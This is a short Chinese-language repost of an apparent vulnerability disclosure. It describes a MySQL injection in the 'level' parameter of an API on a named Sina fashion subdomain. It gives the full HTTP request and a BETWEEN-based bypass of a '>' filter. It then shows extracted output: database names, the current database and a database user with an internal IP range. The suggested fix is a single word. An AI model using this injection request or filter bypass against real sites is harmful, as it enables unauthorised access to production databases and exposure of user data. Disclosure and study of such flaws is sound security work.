欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

新浪微博某站MySQL注射(绕过过滤)

程序员文章站 2022-04-12 08:43:00
拿起手机逛了一逛微博,看到有个时尚美搭的页面,点进去看了看,于是就注入了 GET /home/api/?s=front&page=2&size=50&level=&a...

拿起手机逛了一逛微博,看到有个时尚美搭的页面,点进去看了看,于是就注入了

GET /home/api/?s=front&page=2&size=50&level=&callback=HWFSTART&a=get_model_show&level=1&order=time&_=1459937698262 HTTP/1.1

Host: try.fashion.sina.com.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://fashion.sina.com.cn/match/?ac=gz

Cookie: 马赛克

Connection: close

注入参数#level

对>进行了过滤,使用between绕过

available databases [3]:

[*] information_schema

[*] probation

[*] test

当前数据库用户: 'probation_r@10.71.%'

当前数据库: 'probation'

修复方案:

过滤